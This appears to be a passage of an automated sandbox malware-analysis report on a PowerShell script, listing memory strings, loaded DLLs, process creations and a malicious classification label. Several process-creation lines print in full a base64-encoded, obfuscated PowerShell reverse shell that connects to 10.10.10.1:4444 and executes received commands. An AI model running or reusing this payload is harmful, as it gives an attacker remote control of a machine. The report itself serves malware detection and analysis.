Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1203181729.0000017795B68000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1203181729.0000017795B68000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1203181729.0000017795B9D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1377093945.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370795804.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1377093945.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1377093945.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370795804.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

E-Banking Fraud

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=Jump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2627
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2627Jump to behavior
Source: classification engineClassification label: mal68.bank.evad.winPS1@5/12@0/2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5n0fy4d2.0kg.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQAMwAiACwAIAAiADYAQwAiACwAIAAiADYAOQAiACwAIAAiADYANQAiACwAIAAiADYARQAiACwAIAAiADcANAAiACkAOwAKACQAVABDAGgAYQByACAAPQAgACQAUABKACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAGMAaABhAHIAXQBbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsACAAMQA2ACkAIAB9ADsACgAkAFAASgBDAGgAYQByACAAPQAgAC0AagBvAGkAbgAgACQAVABDAGgAYQByADsACgA7ACQAUgB0AFIAagBtAE0AbABZACAAPQAgAE4AZQBXAC0AbwBCACcAJwBKAGUAQwBUACAAKAAnAFMAJwArACcAeQAnACsAJwBzACcAKwAnAHQAJwArACcAZQAnACsAJwBtACcAKwAnAC4AJwArACcATgAnACsAJwBlACcAKwAnAHQAJwArACcALgAnACsAJwBTACcAKwAnAG8AYwBrAGUAdABzAC4AVABDAFAAYwBsAGkARQBuAHQAJwApACgAJwAxADAALgAxADAALgAxADAALgAxACcALAA0ADQANAA0ACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgAIAA9ACAAJABSAHQAUgBqAG0ATQBsAFkALgAoACcARwBlAHQAJwArACcAUwB0AHIAZQBhAG0AJwApACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFAASgBDAGgAYQByACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQARQBuAEIAdAB5AHcAdABnAGgALgBSAGUAQQBkACgAJABQAEoAQwBoAGEAcgAsACAAMAAsACAAJABQAEoAQwBoAGEAcgAuAEwAZQBOAGcAVABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAKACQANgBhADAAYgA1AGUAZgBlACAAPQAgACgATgBlAFcALQBvAEIAJwAnAEoAZQBDAFQAIAAtAFQAeQBwAEUATgBBAG0AZQAgAFMAJwB5ACcAcwAnAHQAJwBlACcAbQAuAFQAJwBlACcAeAAnAHQALgAnAEEAJwBTACcAQwAnAEkAJwBJAEUAJwBuACcAYwAnAG8AJwBkACcAaQAnAG4AJwBnACkALgAoACcARwBlACcAKwAnAHQAUwB0AFIAaQBuAEcAJwApACgAJABQAEoAQwBoAGEAcgAsADAALAAgACQAaQApADsACgAkADMAZABiAGYAZQAyAGUAYgBmAGYAZQAwADcAMgA3ADIANwA5ADQAOQBkADcAYwBlAGMAYwA1ADEANQA3ADMAYgAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACAAJAA2AGEAMABiADUAZQBmAGUAIAAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1ACcAJwB0AC0AUwB0AHIAJwAnAGkAbgBnACAAKQA7AAoAJABKAD0AJABPAD0AJABLAD0AJABFAD0AJABSAD0AJABQAD0AJABXAD0AJABSACAAPQAgACQAewAzAGQAYgBmAGUAMgBlAGIAZgBmAGUAMAA3ADIANwAyADcAOQA0ADkAZAA3AGMAZQBjAGMANQAxADUANwAzAGIAfQAgACsAIAAnABsAWwA5ADQAbQBKAG8AawBlAHIAUwBoAGUAbABsABsAWwAzADkAbQAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsACgAkAHMAIAA9ACAAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAIgBzAGUAJwAnAG4AZAAiACwAIgBiAHkAIgAsACIAZQAiACwAIgB0ACIAKQA7ACAAJABzACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAGkAaQApAC4ARwBlAHQAQgBZAFQAZQBTACgAJABSACkAOwAKACQARQBuAEIAdAB5AHcAdABnAGgALgBXAHIAaQB0AGUAKAAkAHMALAAwACwAJABzAC4ATABlAG4AZwB0AGgAKQA7ACQARQBuAEIAdAB5AHcAdABnAGgALgBGAGwAdQBzAGgAKAApAH0AOwAkAFIAdABSAGoAbQBNAGwAWQAuAEMAbABvAHMAZQAoACkACgA=Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
